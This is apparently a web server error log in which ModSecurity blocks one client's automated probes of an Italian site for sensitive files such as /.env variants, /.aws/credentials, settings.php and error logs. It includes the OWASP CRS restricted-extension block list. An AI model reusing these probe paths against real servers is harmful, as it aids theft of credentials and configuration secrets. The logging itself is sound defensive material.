[Fri Jan 09 16:49:27.570938 2026] [:error] [pid 1293937] [client 18.130.245.147:43856] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aWEjhy30tpu2Qs_7o9csEAAAAAY"]
[Fri Jan 09 16:49:27.571094 2026] [:error] [pid 1293937] [client 18.130.245.147:43856] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aWEjhy30tpu2Qs_7o9csEAAAAAY"]
[Fri Jan 09 16:49:27.571284 2026] [:error] [pid 1293937] [client 18.130.245.147:43856] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aWEjhy30tpu2Qs_7o9csEAAAAAY"]
[Fri Jan 09 16:49:27.571444 2026] [:error] [pid 1293937] [client 18.130.245.147:43856] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aWEjhy30tpu2Qs_7o9csEAAAAAY"]
[Fri Jan 09 16:49:27.777978 2026] [authz_core:error] [pid 1295010] [client 18.130.245.147:43912] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/www
[Fri Jan 09 16:49:28.064354 2026] [:error] [pid 1290989] [client 18.130.245.147:43974] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod.local"] [unique_id "aWEjiLwxb_CFGAx2PBFTCwAAAAQ"]
[Fri Jan 09 16:49:28.064560 2026] [:error] [pid 1290989] [client 18.130.245.147:43974] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod.local"] [unique_id "aWEjiLwxb_CFGAx2PBFTCwAAAAQ"]
[Fri Jan 09 16:49:28.064714 2026] [:error] [pid 1290989] [client 18.130.245.147:43974] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod.local"] [unique_id "aWEjiLwxb_CFGAx2PBFTCwAAAAQ"]
[Fri Jan 09 16:49:28.164408 2026] [:error] [pid 1290988] [client 18.130.245.147:43996] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/sites/default/settings.php"] [unique_id "aWEjiJnqcf3ij-c56sst_QAAAAM"]
[Fri Jan 09 16:49:28.164629 2026] [:error] [pid 1290988] [client 18.130.245.147:43996] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/sites/default/settings.php"] [unique_id "aWEjiJnqcf3ij-c56sst_QAAAAM"]
[Fri Jan 09 16:49:28.164837 2026] [:error] [pid 1290988] [client 18.130.245.147:43996] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/sites/default/settings.php"] [unique_id "aWEjiJnqcf3ij-c56sst_QAAAAM"]
[Fri Jan 09 16:49:28.269834 2026] [:error] [pid 1291018] [client 18.130.245.147:44016] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aWEjiPa-381C0T8V_x3aaAAAAAU"]
[Fri Jan 09 16:49:28.270057 2026] [:error] [pid 1291018] [client 18.130.245.147:44016] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aWEjiPa-381C0T8V_x3aaAAAAAU"]
[Fri Jan 09 16:49:28.270227 2026] [:error] [pid 1291018] [client 18.130.245.147:44016] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aWEjiPa-381C0T8V_x3aaAAAAAU"]
[Fri Jan 09 16:49:28.465674 2026] [:error] [pid 1293937] [client 18.130.245.147:44070] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWEjiC30tpu2Qs_7o9csEQAAAAY"]
[Fri Jan 09 16:49:28.465833 2026] [:error] [pid 1293937] [client 18.130.245.147:44070] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWEjiC30tpu2Qs_7o9csEQAAAAY"]
[Fri Jan 09 16:49:28.466024 2026] [:error] [pid 1293937] [client 18.130.245.147:44070] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWEjiC30tpu2Qs_7o9csEQAAAAY"]
[Fri Jan 09 16:49:28.466200 2026] [:error] [pid 1293937] [client 18.130.245.147:44070] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aWEjiC30tpu2Qs_7o9csEQAAAAY"]
[Fri Jan 09 16:49:28.558765 2026] [:error] [pid 1295009] [client 18.130.245.147:44090] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.1"] [unique_id "aWEjiBOQmYLXvoRWxa_UsgAAAAc"]
[Fri Jan 09 16:49:28.558970 2026] [:error] [pid 1295009] [client 18.130.245.147:44090] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.1"] [unique_id "aWEjiBOQmYLXvoRWxa_UsgAAAAc"]
[Fri Jan 09 16:49:28.559137 2026] [:error] [pid 1295009] [client 18.130.245.147:44090] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.1"] [unique_id "aWEjiBOQmYLXvoRWxa_UsgAAAAc"]
[Fri Jan 09 16:49:28.651668 2026] [:error] [pid 1295010] [client 18.130.245.147:44114] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev.local"] [unique_id "aWEjiCTjpONdb2ogUxontgAAAAg"]
[Fri Jan 09 16:49:28.651861 2026] [:error] [pid 1295010] [client 18.130.245.147:44114] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev.local"] [unique_id "aWEjiCTjpONdb2ogUxontgAAAAg"]
[Fri Jan 09 16:49:28.652015 2026] [:error] [pid 1295010] [client 18.130.245.147:44114] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev.local"] [unique_id "aWEjiCTjpONdb2ogUxontgAAAAg"]
[Fri Jan 09 16:49:28.845196 2026] [:error] [pid 1290986] [client 18.130.245.147:44142] [client 18.130.245.147] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aWEjiHvPx48oXeBpWHAqZAAAAAE"]
[Fri Jan 09 16:49:28.845469 2026] [:error] [pid 1290986] [client 18.130.245.147:44142] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aWEjiHvPx48oXeBpWHAqZAAAAAE"]
[Fri Jan 09 16:49:28.845665 2026] [:error] [pid 1290986] [client 18.130.245.147:44142] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aWEjiHvPx48oXeBpWHAqZAAAAAE"]
[Fri Jan 09 16:49:28.946531 2026] [authz_core:error] [pid 1290989] [client 18.130.245.147:44174] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml
[Fri Jan 09 16:49:29.148582 2026] [:error] [pid 1291018] [client 18.130.245.147:44212] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aWEjifa-381C0T8V_x3aaQAAAAU"]
[Fri Jan 09 16:49:29.148794 2026] [:error] [pid 1291018] [client 18.130.245.147:44212] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aWEjifa-381C0T8V_x3aaQAAAAU"]
[Fri Jan 09 16:49:29.148968 2026] [:error] [pid 1291018] [client 18.130.245.147:44212] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aWEjifa-381C0T8V_x3aaQAAAAU"]
[Fri Jan 09 16:49:29.251490 2026] [:error] [pid 1290987] [client 18.130.245.147:44228] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aWEjiZa6YpMWICkHe7jGXQAAAAI"]
[Fri Jan 09 16:49:29.251697 2026] [:error] [pid 1290987] [client 18.130.245.147:44228] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aWEjiZa6YpMWICkHe7jGXQAAAAI"]
[Fri Jan 09 16:49:29.251851 2026] [:error] [pid 1290987] [client 18.130.245.147:44228] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aWEjiZa6YpMWICkHe7jGXQAAAAI"]
[Fri Jan 09 16:49:29.347963 2026] [:error] [pid 1293937] [client 18.130.245.147:44264] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/logs/error.log"] [unique_id "aWEjiS30tpu2Qs_7o9csEgAAAAY"]
[Fri Jan 09 16:49:29.348264 2026] [:error] [pid 1293937] [client 18.130.245.147:44264] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/logs/error.log"] [unique_id "aWEjiS30tpu2Qs_7o9csEgAAAAY"]
[Fri Jan 09 16:49:29.348431 2026] [:error] [pid 1293937] [client 18.130.245.147:44264] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/logs/error.log"] [unique_id "aWEjiS30tpu2Qs_7o9csEgAAAAY"]
[Fri Jan 09 16:49:29.448320 2026] [:error] [pid 1295009] [client 18.130.245.147:44286] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aWEjiROQmYLXvoRWxa_UswAAAAc"]
[Fri Jan 09 16:49:29.448634 2026] [:error] [pid 1295009] [client 18.130.245.147:44286] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aWEjiROQmYLXvoRWxa_UswAAAAc"]
